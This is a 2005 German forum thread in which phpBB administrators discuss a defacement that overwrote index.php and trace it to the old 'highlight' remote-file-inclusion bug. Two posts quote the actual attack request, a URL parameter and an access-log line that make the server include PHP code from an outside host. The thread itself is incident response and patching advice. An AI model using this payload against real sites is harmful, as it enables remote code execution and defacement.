Neuer Virus by sirh0t

whyte · Beitrag von **whyte** » 10.12.2005 23:23

Hallo,

wenn tatsächlich bei einem Aufruf die index.php wieder durch eine neue ersetzt wird, dann gehe ich davon aus, dass in einer anderen Datei dies programmiert wurd.
Ich würde hingehe und mal in sämtlichen Verzeichnissen in den Dateien z.B. das Wort "FUCK" suche

Code: Alles auswählen

grep FUCK *

so könnte man zumindest festestellen, wo das überhaupt herkommt.

UND: ich pflichte meinem Vorsprecher bei, ein update ist einfach nur Pflich!

Gruß
Marco

Mihil · Beitrag von **Mihil** » 10.12.2005 23:27

Mein CrackerTracker hat den Angriff abgefangen, dieses Skript wird dann ausgeführt:
http://www.yatas.com/phpbb_private.txt

Beitrag von **Dennis63** » 11.12.2005 00:52

Wenn so ein Script auf dem Server ausgeführt wird, kann man sich ja auch kaum beschweren.

Fragt sich nur, wer das Script vorher hochgeladen hat. Ich glaube kaum, daß es durch ein unbekanntest Sicherheitsloch im phpBB 2.0.18 entstanden ist. Sowas würden die Leute viel geschickter ausnutzen.

Lösche alle Files auf dem FTP Server und installiere das phpBB2.0.18 neu. Danach spiele ein altes Backup der Datenbank wieder ein. - Fertig.

Grüße
Dennis

Mihil · Beitrag von **Mihil** » 11.12.2005 13:17

Das Skript geht auch nur mit älteren Versionen, oder? Der komplette Pfad lautete nämlich so:
t=71&highlight=%2527.$poster=include($_GET[m]).%2527&m=http://www.yatas.com/phpbb_private.txt?&

Und das mit dem "highlight" wurde doch schon längst gefixt, oder?

Valerie Raghnall · Beitrag von **Valerie Raghnall** » 11.12.2005 13:33

also ich hab grade gesehen, dass der gute crackertracker es bei mir einwandfrei abgefangen hat... so etwa 20 versuche in 10 minuten oder so

Beitrag von **Dennis63** » 11.12.2005 13:38

Das ist eine Ausnutzung des Highlight-BUGs in alten (!!) phpBB Versionen.

Grüße
Dennis

Diesel · Beitrag von **Diesel** » 11.12.2005 13:48

Ganz klar, hier wurde schlampig oder garnicht gepatched. (Vielleicht der gravierende Fehler, nur die Datenbank immer geupdatet zu haben?!?)

Am besten wäre es die Datenbank zu retten und ein neues PhpBB 2.0.18 KOMPLETT aufzuspielen. Deine Files sind nicht vertrauenswürdig, da sie offenbar manipuliert sind, garnicht geupdatet und auf einem alten Stand sind, den du offensichtlich nicht kennst etc.

Ist das Beste so, im übrigen war hier eindeutig der Highlight-Exploit am werkeln. (siehe Dennis)

Ich habe selbst mehrere Angriffe dieser Art in meinem Forum gehabt und dieser spezielle Fall sollte NUR die Index.php im Normalfall angegriffen haben, aber bei der alten Forumversion ist natürlich nicht ausschließbar, dass sich noch weitere Würmer bedient haben.

Wie gesagt, komplett neu die Files des Forums uploaden und Mods wieder nachträglich einbauen ist eindeutig der schnellste und vorallem sicherste Weg.

Compiler · Beitrag von **Compiler** » 12.12.2005 08:15

Hallo Leute,

es war ein phpbb 2.0.11 von einem anderen User des Hosters. Also es lag nicht an mir.

Code: Alles auswählen

72.9.246.108 - - [10/Dec/2005:15:17:52 +0100] "GET /viewtopic.php?t=756&highlight=%2527.$poster=include($_GET[m]).%2527&m=http://www.yatas.com/phpbb_private.txt?& HTTP/1.0" 200 28381 "http://www.google.nl/" "Mozilla/4.0 (modded by sirh0t Mist Aleks)"

Siehe auch hier.

MfG
Compiler

Beitrag von **Dennis63** » 12.12.2005 20:52

Bei einem phpBB 2.0.11 ist es kein Wunder. Das Forum halt halt ein Sicherheitsloch.

Aber wenn es auf einem anderen Account war, dann würde ich mir ganz schnell einen neuen Hoster suchen. Wenn ein anderer Kunde auf Deine Daten zugriefen kann, dann kann er ja ganz einfach in das Admin-Menü Deines Forums kommen oder deine User mit Spam vollmüllen.

Darf ich fragen, bei welchem Hoster du bist?

Grüße
Dennis

michi50 · Beitrag von **michi50** » 16.12.2005 23:40

Das gleiche stand auf einmal bei meinem phpbb 2.2 testboard!
Da wurde auch die index.php überschrieben!